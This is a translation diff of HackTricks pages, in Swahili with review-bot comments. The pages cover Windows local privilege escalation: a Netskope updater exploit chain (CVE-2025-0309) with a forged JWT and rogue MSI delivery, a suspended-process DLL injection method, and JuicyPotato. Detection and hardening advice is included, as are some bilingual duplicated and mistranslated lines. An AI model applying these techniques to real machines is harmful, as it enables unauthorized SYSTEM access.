 | 
			
		||||
- [ ] Taarifa za kuvutia katika [**files inside the Recycle Bin**](windows-local-privilege-escalation/index.html#credentials-in-the-recyclebin)?
 | 
			
		||||
- [ ] Unataka [**kuomba nywila**](windows-local-privilege-escalation/index.html#ask-for-credentials) kutoka kwa mtumiaji?
 | 
			
		||||
- [ ] Faili za kuvutia ndani ya [**Recycle Bin**](windows-local-privilege-escalation/index.html#credentials-in-the-recyclebin)?
 | 
			
		||||
- [ ] Mengine [**registry containing credentials**](windows-local-privilege-escalation/index.html#inside-the-registry)?
 | 
			
		||||
- [ ] Ndani ya [**Browser data**](windows-local-privilege-escalation/index.html#browsers-history) (dbs, history, bookmarks, ...)?
 | 
			
		||||
- [ ] [**Generic password search**](windows-local-privilege-escalation/index.html#generic-password-search-in-files-and-registry) katika faili na registry
 | 
			
		||||
- [ ] [**Tools**](windows-local-privilege-escalation/index.html#tools-that-search-for-passwords) to automatically search for passwords
 | 
			
		||||
- [ ] [**Generic password search**](windows-local-privilege-escalation/index.html#generic-password-search-in-files-and-registry) katika files na registry
 | 
			
		||||
- [ ] [**Tools**](windows-local-privilege-escalation/index.html#tools-that-search-for-passwords) za kutafuta nywila moja kwa moja
 | 
			
		||||
 | 
			
		||||
### [Leaked Handlers](windows-local-privilege-escalation/index.html#leaked-handlers)
 | 
			
		||||
 | 
			
		||||
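Review bot: "za kutafuta nywila moja kwa moja" renders "automatically" as "directly"; "kiotomatiki" is the intended sense and matches the English link text (`Tools ... to automatically search for passwords`) it replaces. Unchanged on both sides but worth fixing while here: the anchor `#cached-gpp-pasword` is misspelled ("pasword") and will only resolve if the target heading carries the same typo.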
@ -110,6 +110,6 @@
 | 
			
		||||
 | 
			
		||||
### [Pipe Client Impersonation](windows-local-privilege-escalation/index.html#named-pipe-client-impersonation)
 | 
			
		||||
 | 
			
		||||
- [ ] Angalia ikiwa unaweza kuitumia vibaya
 | 
			
		||||
- [ ] Kagua kama unaweza kuiboresha (abuse) hiyo
 | 
			
		||||
 | 
			
		||||
{{#include ../banners/hacktricks-training.md}}
 | 
			
		||||
 | 
			
		||||
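Review bot: "Kagua kama unaweza kuiboresha (abuse) hiyo" mistranslates the item: "kuiboresha" means "improve it", whereas the old line "Angalia ikiwa unaweza kuitumia vibaya" was the correct rendering of "abuse"; keep the old verb and drop the parenthetical English, which only signals that the translator was unsure.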
										
											
												File diff suppressed because it is too large
							@ -1,28 +1,28 @@
 | 
			
		||||
# Kutumiwa Vibaya kwa Auto-Updaters za Shirika na IPC zilizo na Vibali (e.g., Netskope stAgentSvc)
 | 
			
		||||
# Kutumia Vibaya Auto-Updaters za Enterprise na Privileged IPC (mf., Netskope stAgentSvc)
 | 
			
		||||
 | 
			
		||||
{{#include ../../banners/hacktricks-training.md}}
 | 
			
		||||
 | 
			
		||||
Ukurasa huu unazungumzia darasa la Windows local privilege escalation chains zinazopatikana katika endpoint agents na updaters za shirika ambazo zinaonyesha uso wa IPC wa low‑friction na mtiririko wa update wenye vibali. Mfano unaowakilisha ni Netskope Client for Windows < R129 (CVE-2025-0309), ambapo mtumiaji mwenye vibali vya chini anaweza kulazimishwa kujiunga na server inayodhibitiwa na mshambuliaji kisha kuwasilisha MSI ya uharibifu ambayo service ya SYSTEM inaisakinisha.
 | 
			
		||||
Ukurasa huu unagawa kwa ujumla daraja la chains za Windows local privilege escalation zilizopatikana kwenye enterprise endpoint agents na updaters zinazotoa uso wa IPC rahisi kutumia na mchakato wa masasisho wenye ruhusa za juu. Mfano unaowakilisha ni Netskope Client for Windows < R129 (CVE-2025-0309), ambapo mtumiaji mwenye ruhusa ndogo anaweza kulazimisha enrollment kwenye server inayodhibitiwa na mshambuliaji na kisha kuwasilisha MSI ya uharibifu ambayo huduma ya SYSTEM inaisakinisha.
 | 
			
		||||
 | 
			
		||||
Mawazo muhimu unayoweza kutumia dhidi ya bidhaa zinazofanana:
 | 
			
		||||
- Abuse a privileged service’s localhost IPC to force re‑enrollment or reconfiguration to an attacker server.
 | 
			
		||||
- Implement the vendor’s update endpoints, deliver a rogue Trusted Root CA, and point the updater to a malicious, “signed” package.
 | 
			
		||||
- Evade weak signer checks (CN allow‑lists), optional digest flags, and lax MSI properties.
 | 
			
		||||
- If IPC is “encrypted”, derive the key/IV from world‑readable machine identifiers stored in the registry.
 | 
			
		||||
- If the service restricts callers by image path/process name, inject into an allow‑listed process or spawn one suspended and bootstrap your DLL via a minimal thread‑context patch.
 | 
			
		||||
Mafikra muhimu unaweza kuyatumia dhidi ya bidhaa zinazofanana:
 | 
			
		||||
- Tumia localhost IPC ya huduma iliyo na ruhusa za juu kulazimisha re‑enrollment au reconfiguration kwenda kwenye server ya mshambuliaji.
 | 
			
		||||
- Tekeleza endpoints za vendor za update, wasilishe rogue Trusted Root CA, na elekeza updater kwa package hatari, “signed”.
 | 
			
		||||
- Epuka ukaguzi dhaifu wa signer (CN allow‑lists), flags za digest za hiari, na mali za MSI zilizo na uvumilivu mdogo.
 | 
			
		||||
- Ikiwa IPC ime “encrypted”, zaa key/IV kutoka kwa vitambulisho vya mashine vinavyososwa kwa kusomeka na wote kwenye registry.
 | 
			
		||||
- Ikiwa huduma inazuia waite kwa image path/process name, weka injection kwenye process iliyoorodheshwa kwenye allow‑list au zalisha moja kwa status suspended na bootstrap DLL yako kupitia mabadiliko madogo ya thread‑context.
 | 
			
		||||
 | 
			
		||||
---
 | 
			
		||||
## 1) Forcing enrollment to an attacker server via localhost IPC
 | 
			
		||||
## 1) Kulazimisha enrollment kwenye server ya mshambuliaji kupitia localhost IPC
 | 
			
		||||
 | 
			
		||||
Wakala wengi hutoa mchakato wa user‑mode UI ambao unazungumza na service ya SYSTEM juu ya localhost TCP kwa kutumia JSON.
 | 
			
		||||
Wakala wengi huambatanisha mchakato wa UI wa user‑mode ambao unazungumza na huduma ya SYSTEM juu ya localhost TCP kwa kutumia JSON.
 | 
			
		||||
 | 
			
		||||
Imeonekana katika Netskope:
 | 
			
		||||
- UI: stAgentUI (low integrity) ↔ Service: stAgentSvc (SYSTEM)
 | 
			
		||||
- IPC command ID 148: IDP_USER_PROVISIONING_WITH_TOKEN
 | 
			
		||||
 | 
			
		||||
Exploit flow:
 | 
			
		||||
1) Craft a JWT enrollment token whose claims control the backend host (e.g., AddonUrl). Use alg=None so no signature is required.
 | 
			
		||||
2) Send the IPC message invoking the provisioning command with your JWT and tenant name:
 | 
			
		||||
Mtiririko wa exploit:
 | 
			
		||||
1) Tunga token ya JWT ya enrollment yenye claims zinazoamua backend host (mf., AddonUrl). Tumia alg=None ili saini isiwe muhimu.
 | 
			
		||||
2) Tuma ujumbe wa IPC unaoitisha amri ya provisioning ukiweka JWT yako na jina la tenant:
 | 
			
		||||
```json
 | 
			
		||||
{
 | 
			
		||||
"148": {
 | 
			
		||||
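Review bot: the new intro introduces three meaning errors. "Ukurasa huu unagawa kwa ujumla" says the page "divides" the class of chains, where the old "unazungumzia" / the sense "generalizes" needs "unaelezea kwa ujumla"; "mali za MSI zilizo na uvumilivu mdogo" ("low tolerance") inverts "lax MSI properties", which the English bullet on the old side uses to mean permissive; and "vitambulisho vya mashine vinavyososwa kwa kusomeka na wote" is garbled for "vinavyosomeka na mtumiaji yeyote". In the exploit flow, "Tumia alg=None ili saini isiwe muhimu" ("so the signature is not important") should be "isihitajike" ("not required"), which is exactly what `alg=None` buys. Missing documentation: the page names the affected range (`Netskope Client for Windows < R129`, CVE-2025-0309) but never states the remediation; one line saying that the fix is to run R129 or later, together with the defensive checks the text implies (reject unsigned JWT enrollment tokens, restrict which callers may issue IPC command 148), would make the section useful to defenders as well.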
@ -31,88 +31,88 @@ Exploit flow:
 | 
			
		||||
}
 | 
			
		||||
}
 | 
			
		||||
```
 | 
			
		||||
3) Service inaanza kuwasiliana na rogue server yako kwa ajili ya enrollment/config, kwa mfano:
 | 
			
		||||
3) Huduma inaanza kuwasiliana na rogue server yako kwa ajili ya enrollment/config, kwa mfano:
 | 
			
		||||
- /v1/externalhost?service=enrollment
 | 
			
		||||
- /config/user/getbrandingbyemail
 | 
			
		||||
 | 
			
		||||
Vidokezo:
 | 
			
		||||
- Ikiwa uthibitishaji wa mtumaji unategemea njia/jina, tuma ombi kutoka kwa vendor binary iliyoorodheshwa kwenye orodha ya kuruhusiwa (angalia §4).
 | 
			
		||||
- Ikiwa caller verification inategemea path/name‑based, anzisha ombi kutoka kwa vendor binary iliyoorodheshwa (angalia §4).
 | 
			
		||||
 | 
			
		||||
---
 | 
			
		||||
## 2) Hijacking the update channel to run code as SYSTEM
 | 
			
		||||
## 2) Kuiba chaneli ya masasisho ili kuendesha msimbo kama SYSTEM
 | 
			
		||||
 | 
			
		||||
Mara client inapozungumza na server yako, tekeleza endpoints zinazotarajiwa na ielekeze kwa attacker MSI. Mfuatano wa kawaida:
 | 
			
		||||
Mara client anapozungumza na server yako, tekeleza endpoints zinazotarajiwa na muelekeze kwa MSI ya mshambuliaji. Mfuatano wa kawaida:
 | 
			
		||||
 | 
			
		||||
1) /v2/config/org/clientconfig → Rudisha JSON config yenye kipindi kifupi sana cha updater, kwa mfano:
 | 
			
		||||
1) /v2/config/org/clientconfig → Rudisha JSON config yenye muda mfupi sana wa updater, kwa mfano:
 | 
			
		||||
```json
 | 
			
		||||
{
 | 
			
		||||
"clientUpdate": { "updateIntervalInMin": 1 },
 | 
			
		||||
"check_msi_digest": false
 | 
			
		||||
}
 | 
			
		||||
```
 | 
			
		||||
2) /config/ca/cert → Rudisha cheti cha CA katika fomati PEM. Huduma inakisakinisha katika Local Machine Trusted Root store.
 | 
			
		||||
3) /v2/checkupdate → Weka metadata inayorejelea MSI haribifu na toleo bandia.
 | 
			
		||||
2) /config/ca/cert → Rejesha PEM CA certificate. Huduma inaiweka kwenye Local Machine Trusted Root store.
 | 
			
		||||
3) /v2/checkupdate → Toa metadata inayorejelea MSI hasidi na toleo bandia.
 | 
			
		||||
 | 
			
		||||
Bypassing common checks seen in the wild:
 | 
			
		||||
- Signer CN allow‑list: huduma inaweza tu kuangalia Subject CN ni “netSkope Inc” au “Netskope, Inc.”. CA yako ya uhalifu inaweza kutoa leaf yenye CN hiyo na kusaini MSI.
 | 
			
		||||
- CERT_DIGEST property: jumuisha mali ya MSI isiyoharibu yenye jina CERT_DIGEST. Hakuna utekelezaji wa lazima wakati wa usakinishaji.
 | 
			
		||||
- Optional digest enforcement: config flag (e.g., check_msi_digest=false) inazima uthibitishaji wa ziada wa kriptografia.
 | 
			
		||||
- Signer CN allow‑list: huduma inaweza tu kuangalia Subject CN ikiwa ni sawa na “netSkope Inc” au “Netskope, Inc.”. Rogue CA yako inaweza kutoa leaf yenye CN hiyo na kusaini MSI.
 | 
			
		||||
- CERT_DIGEST property: jumuisha mali ya MSI isiyo hatari iitwayo CERT_DIGEST. Hakuna utekelezaji wakati wa usakinishaji.
 | 
			
		||||
- Optional digest enforcement: bendera ya config (mf., check_msi_digest=false) inazima uthibitishaji wa ziada wa kriptografia.
 | 
			
		||||
 | 
			
		||||
Matokeo: service ya SYSTEM inakisakinisha MSI yako kutoka
 | 
			
		||||
Result: huduma ya SYSTEM inasakinisha MSI yako kutoka
 | 
			
		||||
C:\ProgramData\Netskope\stAgent\data\*.msi
 | 
			
		||||
ikitekeleza nambari yoyote kama NT AUTHORITY\SYSTEM.
 | 
			
		||||
ikitekeleza msimbo wowote kama NT AUTHORITY\SYSTEM.
 | 
			
		||||
 | 
			
		||||
---
 | 
			
		||||
## 3) Forging encrypted IPC requests (when present)
 | 
			
		||||
 | 
			
		||||
Kutoka R127, Netskope ilifunika IPC JSON katika uwanja encryptData unaoonekana kama Base64. Reversing ilionyesha AES yenye key/IV zinazotokana na thamani za registry zinazoweza kusomwa na mtumiaji yeyote:
 | 
			
		||||
From R127, Netskope wrapped IPC JSON in an encryptData field that looks like Base64. Reversing showed AES with key/IV derived from registry values readable by any user:
 | 
			
		||||
- Key = HKLM\SOFTWARE\NetSkope\Provisioning\nsdeviceidnew
 | 
			
		||||
- IV  = HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductID
 | 
			
		||||
 | 
			
		||||
Wavamizi wanaweza kuiga encryption na kutuma amri za IPC zenye encryption halali kutoka kwa mtumiaji wa kawaida. Ushauri wa jumla: ikiwa agent kwa ghafla “inaficha” IPC yake, tazama device IDs, product GUIDs, install IDs chini ya HKLM kama nyenzo za encryption.
Wavamizi wanaweza kurudia usimbaji na kutuma amri za kusimbwa halali kutoka kwa mtumiaji wa kawaida. Kidokezo kwa ujumla: ikiwa agent ghafla “encrypts” IPC yake, angalia device IDs, product GUIDs, install IDs chini ya HKLM kama nyenzo.

---
## 4) Bypassing IPC caller allow‑lists (path/name checks)

Huduma zingine hujaribu kuthibitisha peer kwa kutatua PID ya muunganisho wa TCP na kulinganisha image path/name dhidi ya binaries zilizoorodheshwa za vendor chini ya Program Files (mfano stagentui.exe, bwansvc.exe, epdlp.exe).
Some services try to authenticate the peer by resolving the TCP connection’s PID and comparing the image path/name against allow‑listed vendor binaries located under Program Files (e.g., stagentui.exe, bwansvc.exe, epdlp.exe).

Njia mbili za vitendo:
- DLL injection ndani ya process iliyo kwenye allow‑list (mfano nsdiag.exe) na kushika/proxy IPC kutoka ndani yake.
- Piga kengele binary iliyoorodheshwa ikifufuliwa kwa hali ya suspended na kuanzisha DLL yako ya proxy bila CreateRemoteThread (see §5) ili kutosheleza sheria zilizotekelezwa na driver kuzuia tampering.
Two practical bypasses:
- DLL injection into an allow‑listed process (e.g., nsdiag.exe) and proxy IPC from inside it.
- Spawn an allow‑listed binary suspended and bootstrap your proxy DLL without CreateRemoteThread (see §5) to satisfy driver‑enforced tamper rules.

---
## 5) Tamper‑protection friendly injection: suspended process + NtContinue patch

Products mara nyingi huja na minifilter/OB callbacks driver (mfano Stadrv) inayokata haki hatari kutoka kwa handles za processes zilizo na ulinzi:
- Process: inatoa mazingira kama PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_READ, PROCESS_DUP_HANDLE, PROCESS_SUSPEND_RESUME
- Thread: inazuia hadi THREAD_GET_CONTEXT, THREAD_QUERY_LIMITED_INFORMATION, THREAD_RESUME, SYNCHRONIZE
Products often ship a minifilter/OB callbacks driver (e.g., Stadrv) to strip dangerous rights from handles to protected processes:
- Process: removes PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_VM_READ, PROCESS_DUP_HANDLE, PROCESS_SUSPEND_RESUME
- Thread: restricts to THREAD_GET_CONTEXT, THREAD_QUERY_LIMITED_INFORMATION, THREAD_RESUME, SYNCHRONIZE

Loader ya user‑mode inayotegemewa na kuheshimu vikwazo hivi:
1) CreateProcess ya vendor binary na CREATE_SUSPENDED.
2) Pata handles ambazo bado unaruhusiwa: PROCESS_VM_WRITE | PROCESS_VM_OPERATION kwa process, na thread handle yenye THREAD_GET_CONTEXT/THREAD_SET_CONTEXT (au tu THREAD_RESUME ikiwa unatayarisha code kwenye RIP inayojulikana).
3) Andika juu ya ntdll!NtContinue (au thunk nyingine ya mapema, iliyoorodheshwa kwa hakika) kwa stub ndogo inayopiga LoadLibraryW kwenye path ya DLL yako, kisha kuruka kurudi.
4) ResumeThread ili kuamsha stub yako ndani ya process, ikipakia DLL yako.
Loader ya user‑mode yenye kuaminika inayoheshimu vikwazo hivi:
1) CreateProcess ya binary ya vendor kwa CREATE_SUSPENDED.
2) Pata handles unazoruhusiwa nadal: PROCESS_VM_WRITE | PROCESS_VM_OPERATION kwenye process, na thread handle yenye THREAD_GET_CONTEXT/THREAD_SET_CONTEXT (au THREAD_RESUME tu ikiwa unatengeneza patch kwenye RIP inayojulikana).
3) Andika juu ntdll!NtContinue (au thunk nyingine ya mapema, iliyohakikishiwa‑mapped) na stub ndogo inayomwita LoadLibraryW kwa path ya DLL yako, kisha irudi.
4) ResumeThread ili kusababisha stub yako ndani ya process, ikipakia DLL yako.

Kwa sababu haukutumia PROCESS_CREATE_THREAD au PROCESS_SUSPEND_RESUME kwenye process iliyokuwa tayari na ulinzi (uliiunda wewe), sera ya driver inatimizwa.
Kwa kuwa hukutumia PROCESS_CREATE_THREAD au PROCESS_SUSPEND_RESUME juu ya process tayari iliyo‑protected (uliunda wewe), sera ya driver inatimizwa.

---
## 6) Practical tooling
- NachoVPN (Netskope plugin) inaendesha otomatiki rogue CA, kusaini MSI haribifu, na kutumika kupeana endpoints zinazohitajika: /v2/config/org/clientconfig, /config/ca/cert, /v2/checkupdate.
- UpSkope ni custom IPC client inayotengeneza ujumbe wowote wa IPC (hiari kwa AES‑encryption) na inajumuisha suspended‑process injection ili asili iwe kutoka kwa binary iliyoorodheshwa.
- NachoVPN (Netskope plugin) inautomate rogue CA, kusaini MSI hasidi, na kutumikia endpoints zinazohitajika: /v2/config/org/clientconfig, /config/ca/cert, /v2/checkupdate.
- UpSkope ni custom IPC client inayotengeneza ujumbe wa IPC yoyote (hiari kwa AES‑encrypted) na inajumuisha suspended‑process injection ili uitoke kutoka kwa binary iliyoorodheshwa.

---
## 7) Detection opportunities (blue team)
- Simamia uongezaji wa Local Machine Trusted Root. Sysmon + registry‑mod eventing (see SpecterOps guidance) hufanya kazi vizuri.
- Tambua utekelezaji wa MSI ulioanzishwa na service ya agent kutoka paths kama C:\ProgramData\<vendor>\<agent>\data\*.msi.
- Angalia logs za agent kwa hosts/tenants zisizotarajiwa za enrollment, kwa mfano: C:\ProgramData\netskope\stagent\logs\nsdebuglog.log – tafuta addonUrl / tenant anomalies na provisioning msg 148.
- Toa alarm juu ya localhost IPC clients ambao si binaries zilizotarajiwa kusainiwa, au wanaotokana na miti ya child process isiyo ya kawaida.
- Monitor additions to Local Machine Trusted Root. Sysmon + registry‑mod eventing (see SpecterOps guidance) inafanya kazi vizuri.
- Flag MSI executions initiated by the agent’s service from paths like C:\ProgramData\<vendor>\<agent>\data\*.msi.
- Review agent logs for unexpected enrollment hosts/tenants, e.g.: C:\ProgramData\netskope\stagent\logs\nsdebuglog.log – angalia addonUrl / tenant anomalies na provisioning msg 148.
- Alert on localhost IPC clients that are not the expected signed binaries, or that originate from unusual child process trees.

---
## Hardening tips for vendors
- Gana enrollment/update hosts kwa allow‑list kali; kataa domains zisizo salama katika clientcode.
- Thibitisha IPC peers kwa primitives za OS (ALPC security, named‑pipe SIDs) badala ya ukaguzi wa image path/name.
- Weka nyenzo za siri nje ya HKLM zinazosomeka kwa wote; ikiwa IPC lazima iwe encrypted, zaa keys kutoka kwa siri zilizo na ulinzi au zigadilishe juu ya channels zilizo thibitishwa.
- Tendea updater kama uso wa supply‑chain: hitaji mnyororo kamili hadi CA uamiliki, thibitisha signatures za package dhidi ya pinned keys, na fail closed ikiwa validation imezimwa katika config.
- Bind enrollment/update hosts to a strict allow‑list; reject untrusted domains in clientcode.
- Authenticate IPC peers with OS primitives (ALPC security, named‑pipe SIDs) instead of image path/name checks.
- Keep secret material out of world‑readable HKLM; if IPC must be encrypted, derive keys from protected secrets or negotiate over authenticated channels.
- Treat the updater as a supply‑chain surface: require a full chain to a trusted CA you control, verify package signatures against pinned keys, and fail closed if validation is disabled in config.

## References
- [Advisory – Netskope Client for Windows – Local Privilege Escalation via Rogue Server (CVE-2025-0309)](https://blog.amberwolf.com/blog/2025/august/advisory---netskope-client-for-windows---local-privilege-escalation-via-rogue-server/)

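Review bot: this part of the hunk carries each of the §4, §5, §7 and hardening paragraphs twice, once in Swahili and once in English ("Huduma zingine hujaribu kuthibitisha peer…" beside "Some services try to authenticate the peer…", "Simamia uongezaji wa Local Machine Trusted Root…" beside "Monitor additions to Local Machine Trusted Root…"); in a Swahili translation file only the Swahili side should survive, and the bullet "Review agent logs for unexpected enrollment hosts/tenants, e.g.: … – angalia addonUrl / tenant anomalies na provisioning msg 148." must not end up half in each language. Two Swahili lines also need fixing: "Piga kengele binary iliyoorodheshwa ikifufuliwa kwa hali ya suspended" means "ring a bell", not "spawn an allow‑listed binary suspended" (the sibling line "Spawn an allow‑listed binary suspended…" gives the intended sense), and "Pata handles unazoruhusiwa nadal" contains the non‑Swahili word "nadal" where the other rendering "Pata handles ambazo bado unaruhusiwa" is correct.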
@ -2,58 +2,57 @@

{{#include ../../banners/hacktricks-training.md}}

> [!WARNING] > JuicyPotato ni ya zama. Kwa ujumla inafanya kazi kwenye matoleo ya Windows hadi Windows 10 1803 / Windows Server 2016. Mabadiliko ya Microsoft yaliyoanza kuingia katika Windows 10 1809 / Server 2019 yalivunja mbinu asilia. Kwa matoleo hayo na mapya zaidi, fikiria mbadala za kisasa kama PrintSpoofer, RoguePotato, SharpEfsPotato/EfsPotato, GodPotato na wengine. Tazama ukurasa hapo chini kwa chaguzi na matumizi za kisasa.

> [!WARNING] > JuicyPotato ni ya zamani. Kwa kawaida hufanya kazi kwenye matoleo ya Windows hadi Windows 10 1803 / Windows Server 2016. Mabadiliko ya Microsoft yaliyoanza kuwasilishwa kuanzia Windows 10 1809 / Server 2019 yalivunja mbinu ya asili. Kwa matoleo hayo na baadaye, fikiria mbadala za kisasa kama PrintSpoofer, RoguePotato, SharpEfsPotato/EfsPotato, GodPotato na wengine. Angalia ukurasa hapa chini kwa chaguzi za kisasa na matumizi.

{{#ref}}
roguepotato-and-printspoofer.md
{{#endref}}

## Juicy Potato (kudhulumu vibali vya dhahabu) <a href="#juicy-potato-abusing-the-golden-privileges" id="juicy-potato-abusing-the-golden-privileges"></a>
## Juicy Potato (abusing the golden privileges) <a href="#juicy-potato-abusing-the-golden-privileges" id="juicy-potato-abusing-the-golden-privileges"></a>

_A sugared version of_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotatoNG)_, with a bit of juice, i.e. **another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM**_
_Toleo lililoboreshwa la_ [_RottenPotatoNG_](https://github.com/breenmachine/RottenPotatoNG)_, na kuongeza kidogo, yaani **another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM**_

#### You can download juicypotato from [https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts](https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts)
#### Unaweza kupakua juicypotato kutoka [https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts](https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts)

### Compatibility quick notes
### Vidokezo vya haraka vya utangamano

- Inafanya kazi kwa kuaminika hadi Windows 10 1803 na Windows Server 2016 wakati muktadha wa sasa una SeImpersonatePrivilege au SeAssignPrimaryTokenPrivilege.
- Imevunjwa na hardening ya Microsoft katika Windows 10 1809 / Windows Server 2019 na baadaye. Tumia mbadala zilizo kwenye link hapo juu kwa matoleo hayo na mapya.
- Imevunjika kwa sababu ya hatua za kuimarisha za Microsoft katika Windows 10 1809 / Windows Server 2019 na baadaye. Tumia mbadala zilizotajwa hapo juu kwa matoleo hayo.

### Summary <a href="#summary" id="summary"></a>
### Muhtasari <a href="#summary" id="summary"></a>

[**From juicy-potato Readme**](https://github.com/ohpe/juicy-potato/blob/master/README.md)**:**

[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) and its [variants](https://github.com/decoder-it/lonelypotato) leverages the privilege escalation chain based on [`BITS`](<https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799(v=vs.85).aspx>) [service](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) having the MiTM listener on `127.0.0.1:6666` and when you have `SeImpersonate` or `SeAssignPrimaryToken` privileges. During a Windows build review we found a setup where `BITS` was intentionally disabled and port `6666` was taken.
[RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG) na [variants](https://github.com/decoder-it/lonelypotato) inategemea privilege escalation chain iliyo msingi kwenye [`BITS`](<https://msdn.microsoft.com/en-us/library/windows/desktop/bb968799(v=vs.85).aspx>) [service](https://github.com/breenmachine/RottenPotatoNG/blob/4eefb0dd89decb9763f2bf52c7a067440a9ec1f0/RottenPotatoEXE/MSFRottenPotato/MSFRottenPotato.cpp#L126) kuwa na kipokezi cha MiTM kwenye `127.0.0.1:6666` na wakati una `SeImpersonate` au `SeAssignPrimaryToken` privileges. Wakati wa mapitio ya kujenga Windows tulipata usanidi ambapo `BITS` ilizimwa kwa kusudi na bandari `6666` ilikuwa imechukuliwa.

We decided to weaponize [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG): **Say hello to Juicy Potato**.
Tukaamua kuitumia kama silaha [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG): **Say hello to Juicy Potato**.

> For the theory, see [Rotten Potato - Privilege Escalation from Service Accounts to SYSTEM](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) and follow the chain of links and references.
> Kwa nadharia, angalia [Rotten Potato - Privilege Escalation from Service Accounts to SYSTEM](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/) na fuata mnyororo wa viungo na rejea.

Tuligundua kuwa, mbali na `BITS`, kuna servere kadhaa za COM tunaweza kuzitumia vibaya. Zinahitaji tu:
Tuligundua kwamba, mbali na `BITS`, kuna seva kadhaa za COM tunazoweza kutumia vibaya. Zinahitaji tu:

1. kuzinduliwa na mtumiaji wa sasa, kawaida “service user” ambaye ana impersonation privileges
1. kuwa zinazowezekana kuanzishwa na mtumiaji wa sasa, kawaida “service user” ambaye ana impersonation privileges
2. kutekeleza interface ya `IMarshal`
3. kukimbia kama mtumiaji mwenye viwango vya juu (SYSTEM, Administrator, …)
3. kuendesha kama mtumiaji aliye na haki za juu (SYSTEM, Administrator, …)

Baada ya majaribio tulipata na kujaribu orodha ndefu ya [interesting CLSID’s](http://ohpe.it/juicy-potato/CLSID/) kwenye matoleo mbalimbali ya Windows.
Baada ya majaribio kadhaa tulipata na kujaribu orodha kubwa ya [interesting CLSID’s](http://ohpe.it/juicy-potato/CLSID/) kwenye matoleo mbalimbali ya Windows.

### Juicy details <a href="#juicy-details" id="juicy-details"></a>
### Maelezo ya kina <a href="#juicy-details" id="juicy-details"></a>

JuicyPotato inakuwezesha:

- **Target CLSID** _chagua CLSID yoyote unayotaka._ [_Here_](http://ohpe.it/juicy-potato/CLSID/) _unaweza kupata orodha iliyopangwa kwa OS._
- **COM Listening port** _taja COM listening port unayopendeleo (badala ya marshalled hardcoded 6666)_
- **COM Listening IP address** _weke server kusikiliza kwenye IP yoyote_
- **Process creation mode** _kutegemea vibali vya mtumiaji aliyefanyakwa impersonation unaweza kuchagua kutoka:_
- **COM Listening port** _ainisha COM listening port unayopendelea (badala ya marshalled hardcoded 6666)_
- **COM Listening IP address** _fungua server kwa anwani yoyote ya IP_
- **Process creation mode** _kulingana na vibali vya mtumiaji aliyefanyiwa impersonation unaweza kuchagua kati ya:_
- `CreateProcessWithToken` (needs `SeImpersonate`)
- `CreateProcessAsUser` (needs `SeAssignPrimaryToken`)
- `both`
- **Process to launch** _anzisha executable au script ikiwa the exploitation itafanikiwa_
- **Process Argument** _rekebisha vigezo vya process iliyozinduliwa_
- **RPC Server address** _kwa njia ya kimyadariko unaweza ku-authenticate kwenye RPC server ya nje_
- **RPC Server port** _inayofaa ikiwa unataka ku-authenticate kwenye server ya nje na firewall inazuia bandari `135`…_
- **TEST mode** _hasa kwa madhumuni ya kujaribu, yaani kujaribu CLSIDs. Inaunda DCOM na inachapisha mtumiaji wa token. See_ [_here for testing_](http://ohpe.it/juicy-potato/Test/)
- **Process to launch** _anzisha executable au script ikiwa exploitation itafanikiwa_
- **Process Argument** _binafsisha hoja za mchakato unaoanzishwa_
- **RPC Server address** _kwa njia ya siri unaweza kuthibitisha kwenye RPC server ya nje_
- **RPC Server port** _inayofaa kama unataka kuthibitisha kwenye server ya nje na firewall inazuia port `135`…_
- **TEST mode** _hasa kwa madhumuni ya majaribio, yaani kujaribu CLSIDs. Inaunda DCOM na kuonyesha mtumiaji wa token. Tazama_ [_here for testing_](http://ohpe.it/juicy-potato/Test/)

### Usage <a href="#usage" id="usage"></a>
```
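Review bot: headings and lead lines are paired in two languages here too ("## Juicy Potato (kudhulumu vibali vya dhahabu)" / "## Juicy Potato (abusing the golden privileges)", "_A sugared version of_…" / "_Toleo lililoboreshwa la_…", "### Compatibility quick notes" / "### Vidokezo vya haraka vya utangamano"); keep the Swahili side consistently so the file does not alternate languages between a heading and its body. In the Swahili summary, "Wakati wa mapitio ya kujenga Windows" reads as a review of building Windows rather than a review of a Windows build ("ukaguzi wa Windows build" keeps the meaning). In the feature list, "kwa njia ya kimyadariko" is not a Swahili word (the sibling "kwa njia ya siri" is usable), "aliyefanyakwa impersonation" should be "aliyefanyiwa impersonation", and "ikiwa the exploitation itafanikiwa" leaves an English article inside the Swahili sentence.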
@ -76,26 +75,26 @@ Optional args:

[**From juicy-potato Readme**](https://github.com/ohpe/juicy-potato/blob/master/README.md#final-thoughts)**:**

Ikiwa mtumiaji ana vibali vya `SeImpersonate` au `SeAssignPrimaryToken` basi wewe ni **SYSTEM**.
Ikiwa mtumiaji ana haki za `SeImpersonate` au `SeAssignPrimaryToken` basi wewe ni **SYSTEM**.

Karibu haiwezekani kuzuia matumizi mabaya ya COM Servers zote hizi. Unaweza kufikiria kubadilisha ruhusa za vitu hivi kupitia `DCOMCNFG`, lakini bahati nzuri — hii itakuwa changamoto.
Karibu haiwezekani kuzuia matumizi mabaya ya COM Servers wote hawa. Unaweza kufikiria kubadilisha ruhusa za vitu hivi kupitia `DCOMCNFG` lakini bahati njema, hii itakuwa changamoto.

